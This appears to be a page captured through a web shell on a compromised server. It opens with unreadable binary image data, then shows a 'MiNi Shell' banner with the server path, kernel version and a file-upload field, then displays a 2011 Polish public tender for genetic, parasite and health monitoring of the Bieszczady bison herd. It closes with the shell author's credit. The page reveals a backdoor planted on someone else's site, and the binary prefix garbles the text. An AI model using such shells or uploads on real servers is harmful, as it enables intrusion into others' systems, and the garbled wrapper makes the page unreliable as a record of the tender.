JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110421/121911-N-2011.html

<p class="kh_header"><b>Krosno: Monitoring genetyczny, Monitoring parazytologiczny oraz Monitoring zdrowia populacji południowej w ramach projektu Ochrona in situ żubra w Polsce - część południowa</b><br>
<b>Numer ogłoszenia: 121911 - 2011; data zamieszczenia: 21.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Lasów Państwowych w Krośnie , ul. Bieszczadzka 2, 38-400 Krosno, woj. podkarpackie, tel. 13 4364451, faks 13 4364301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl; http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Jednostka Organizacyjna Nieposiadjąca Osobowości Prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Monitoring genetyczny, Monitoring parazytologiczny oraz Monitoring zdrowia populacji południowej w ramach projektu Ochrona in situ żubra w Polsce - część południowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z trzech zadań:
1.	Monitoring genetyczny
2.	Monitoring parazytologiczny 
3.	Monitoring zdrowia populacji południowej
Zadanie nr 1
Przedmiotem zamówienia jest: Monitoring genetyczny

I.	Monitoring genetyczny ma na celu ocenę populacji żubrów pod względem genetycznym, oraz określeniem genotypów, o które należy wzbogacić pule genową stada bieszczadzkiego.
II.	Wykonawcy zostaną dostarczone próbki do badań genetycznych, zebrane w ramach zadania Kolekcja tkanek żubrów ze stada w Bieszczadach. Sposób dostarczania prób do analizy ma zostać ustalony z Wykonawcą ww zadania.
1.	Próbki dostarczone Wykonawcy do oceny będą stanowiły materiał biologiczny w postaci: włosów zebranych z legowisk zimowych, lub odpowiednio zakonserwowanych krwi lub innych tkanek pobranych od padłych, eliminowanych lub usypianych żubrów. 
2.	Ilość materiału dostarczonego do analizy to 75 próbek w całym okresie obowiązywania umowy. Ilość próbek dostarczonych do badań w danym roku będzie zależna od dostępności materiału genetycznego.
III.	Metodyka monitoringu genetycznego:
1.	Analiza molekularna
a)	Izolacja DNA: Izolacja metodą kolumnową z określeniem efektywności przy pomocy pomiaru spektrofotometrycznego
b)	Amplifikacja DNA: Amplifikacja 20 sekwencji polimorficznych w reakcjach typu multipleks (mikrosatelity). Znakowanie starterów fluorochromami. Automatyczny odczyt długości fragmentów. Analiza fragmentów MHC przy pomocy enzymów restrykcyjnych.
c)	Analiza:  Charakterystyka populacji - określenie parametrów populacyjnych (równowaga genetyczna; heterozygotyczność; współczynniki Writha), ocena dystansu. 

2.	Analiza rodowodowa polegająca na ocenie rodowodów stad za granicą i wskazania najlepszych możliwych do realizacji rozwiązań przywozu nowych osobników do wzbogacania bieszczadzkiego stada. Analiza rodowodowa obejmuje ocenę podobieństwa genetycznego, składu genotypu pod względem udziału przodków i przynależności do linii matecznej i ojcowskiej.

IV.	Wykonawca do 15 grudnia każdego roku będzie przedstawiał raport zawierający wyniki analizy molekularnej każdej próby, analizę stad i osobników potencjalnie możliwych do przemieszczenia w celu wzbogacenia stad bieszczadzkich żubrów oraz wskazanie innych działań zmierzających do wzbogacenia puli genowej stada bieszczadzkiego. Oprócz tych raportów do 15 czerwca każdego roku Wykonawca będzie przedstawiał informację z bieżącej realizacji zadania. Do 20 grudnia 2013 roku Wykonawca przedstawi raport końcowy, stanowiący podsumowania całego monitoringu genetycznego. Informacje półroczne, raporty z realizacji zadania i raport końcowy powinny być dostarczone do siedziby Zamawiającego.

Zadanie nr 2
Przedmiotem zamówienia jest: Monitoring parazytologiczny

I.	Monitoring parazytologiczny ma na celu określenie stopnia zapasożycenia,  oraz wskazanie metod profilaktyki orazlub leczenia chorób pasożytniczych żubrów z populacji bieszczadzkiej  
1.	Wykonawcy zostaną dostarczone próbki do oceny zapasożycenia zebrane w ramach zadania Kolekcja tkanek żubrów ze stada w Bieszczadach. Sposób dostarczania próbek do analizy zostanie ustalony z Wykonawcą ww zadania.
2.	Materiał biologiczny dostarczony do badań będzie stanowić kał żubrów.
3.	Ilość materiału dostarczonego do analizy to 80 próbek rocznie. 
II.	Metodyka oceny stopnia zapasożycenia:
1.	Próbki muszą być zbadane metodami pozwalającymi na ustalenie ekstensywności i intensywności zarażenia żubrów nicieniami żołądkowo-jelitowymi, nicieniami płucnymi i przywrami wątrobowymi. Analizy należy przeprowadzić trzema metodami:
a)	Metodą flotacji  w kierunku wykrycia jaj nicieni z rodziny Trichostrongylidae, rodzaju Nematodirus, rodzaju Trichocephalus i rodzaju Aonchoteca;
b)	Metodą Baermanna w celu wykrycia larw nicieni płucnych Dictyocaulus viviparus;



c)	Metodą dekantacji w kierunku wykrycia jaj przywr wątrobowych Fasciola hepatica, Parafasciolopsis fasciolaemorpha i Dicrocoelium dendriticum oraz przywr Paramphistomum cervi występujących w żwaczu.

III.	Wykonawca do 15 grudnia każdego roku trwania umowy będzie przedstawiał raport z bieżącej realizacji zadania, zawierający wyniki analizy każdej próby oraz zalecenia dotyczące profilaktyki i leczenia chorób pasożytniczych. Ponadto do 20 grudnia 2013 roku Wykonawca przedstawi podsumowujący raport końcowy. Raporty z realizacji zadania i raport końcowy powinny być dostarczone do siedziby Zamawiającego.

IV.	Wykonawca w przypadku wystąpienia zagrożenia zdrowia żubrów niezwłocznie poinformuję o tym Zamawiającego, wskaże źródło zagrożenia oraz przedstawi zalecenia dla ochrony zdrowia populacji żubrów.

W przypadku, gdy w SIWZ podano nazwy metod badawczych zamawiający dopuszcza zastosowanie metod równoważnych prowadzących do uzyskania wyników o dokładności nie mniejszej niż za pomocą podanych metod.
Zadanie nr 3
Przedmiotem zamówienia jest: Monitoring zdrowia populacji południowej

I.	Monitoring zdrowia populacji południowej ma na celu ocenę  stanu zdrowotnego pod kątem występowania chorób bakteryjnych, wirusowych i grzybiczych oraz zalecenia dla ochrony zdrowia żubrów z  populacji bieszczadzkiej. 

1.	Badania pod kątem występowania chorób bakteryjnych, wirusowych i grzybiczych winny obejmować: 
a.	Wykonanie sekcji anatomopatologicznej każdego eliminowanego lub padłego (o ile stan tuszy na to pozwoli) żubra. Wykonawca jest zobowiązany do przyjazdu w teren w celu przeprowadzenia sekcji. 
b.	Pobieranie materiału biologicznego w formie wycinków tkanek i wymazów ze zmienionych narządów padłego lub wyeliminowanego żubra oraz próbek węzłów chłonnych od każdego wyeliminowanego lub padłego (o ile stan tuszy na to pozwoli) żubra . 

2.	Ilość materiału biologicznego do badań będzie pochodzić maksymalnie od 45 sztuk żubrów w całym okresie obowiązywania umowy. 

3.	Wykonawca jest zobowiązany do wykonania badań laboratoryjnych w kierunku gruźlicy od każdego wyeliminowanego lub padłego (o ile stan tuszy na to pozwoli) żubra.

4.	Decyzja o zakresie badań dodatkowych (histopatologicznych, mikrobiologicznych, mykologicznych, serologicznych) podejmowana będzie przez wykonującego autopsję, jeżeli wyniki sekcji anatomopatologicznej będą wskazywały na taką potrzebę. 

5.	W przypadku wystąpienia lub podejrzenia gruźlicy, Wykonawca jest zobowiązany do zbadania próbek w kierunku gruźlicy w  laboratorium referencyjnym  wskazanym przez Głównego Lekarza Weterynarii, pod warunkiem możliwości pobrania próbek do tych badań. 

6.	Wykonawca zapewni niezbędne odczynniki i pojemniki dla pobierania i utrwalania materiału biologicznego.

II.	Wykonawca do 15 grudnia danego roku będzie zobowiązany do przedstawienia Zamawiającemu raportu z bieżącej realizacji zadania, który musi uwzględniać następujące elementy: 
1.	szczegółowe wyniki prowadzonych autopsji i badań dodatkowych
2.	interpretacje uzyskanych wyników
3.	ocenę stanu zdrowia populacji bieszczadzkich żubrów
4.	zalecenia dotyczące profilaktyki leczenia chorób bakteryjnych, wirusowych i grzybiczych oraz zapobieganie rozprzestrzenianiu się chorób zakaźnych. 
Ponadto Wykonawca do 20 grudnia 2013 roku przedstawi Zamawiającemu podsumowujący raport końcowy, uwzględniający wszystkie ww elementy.

III.	Wykonawca w przypadku wystąpienia zagrożenia zdrowia żubrów niezwłocznie (niezależnie od raportów) poinformuję o tym Zamawiającego, wskaże źródło zagrożenia oraz przedstawi zalecenia dla ochrony zdrowia populacji żubrów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6. Ustawy, polegających na wykonaniu usług zgodnych z przedmiotem niniejszego zamówienia stanowiących do 50 % wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-3, 90.70.00.00-4, 90.72.17.00-4, 90.72.14.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości:
 1000 zł (słownie złotych: jeden  tysiąc złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykonania niniejszego zamówienia nie jest wymagane posiadanie uprawnień przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna że wykonawca spełnia warunek udziału w postępowaniu, jeżeli wykaże że w czasie ostatnich trzech lat lub jeżeli okres działalności jest krótszy to w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej jedną usługę o podobnym charakterze tj. dotyczącą badań genetycznych - minimum 25 prób, badań na obecność pasożytów - minimum 80 prób oraz badań prób patomorfologicznych - minimum 15 prób wykonywanych na żubrach lub innych gatunkach ssaków.
Zamawiający uzna warunek za spełniony na podstawie wykazu oraz oświadczenia złożonego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia złożonego przez Wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w następujących okolicznościach: 

1.	potrzeby wprowadzenia zmian w przedmiocie niniejszego postępowania wywołanych zmianami w przepisach prawa, normach i standardach, zmianami w wiedzy technicznej, zmianami uwarunkowań środowiskowych, technicznych, technologicznych lub innymi okolicznościami;
2.	potrzeby wprowadzenia zmian w sposobie wykonania przedmiotu niniejszego postępowania, wynikających ze zmian  technologicznych, osobowych, w organizacji spełnienia świadczenia, spowodowanych zmianami w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej, zmianami uwarunkowań środowiskowych, technicznych lub innymi okolicznościami;

3.	konieczności zmiany terminu realizacji spowodowanej: 
a)	wystąpieniem warunków atmosferycznych mających wpływ na brak możliwości wykonywania umowy;
b)	zmianami spowodowanymi zmianami przepisów prawa, norm, wiedzy technicznej, ochrony środowiska, itp.,
c)	okolicznościami będącymi następstwem działania organów administracji i innych podmiotów trzecich.
4.	zmiany wynagrodzenia w przypadku zmian stawki podatku VAT, wynikających z obowiązujących w tym zakresie przepisów
5.	zmiany wynagrodzenia umownego w przypadku ograniczenia zakresu przedmiotowego umowy z powodu przyczyn zewnętrznych niezależnych od zamawiającego oraz wykonawcy skutkujących niemożliwością prowadzenia działań w celu wykonania umowy. 
6.	Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
7.	Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w SIWZ, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Lasów Państwowych w Krośnie
ul. Bieszczadzka 2, 38-400 Krosno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.05.2011 godzina 09:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, w sekretariacie, pokój nr 45.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Infrastruktura i Środowisko oraz przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej.

Zamawiajacy nie będzie żądał od wykonawców zagranicznych zaświadczenia o niezaleganiu w opłatach na ubezpieczenie społeczne i zdrowotne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com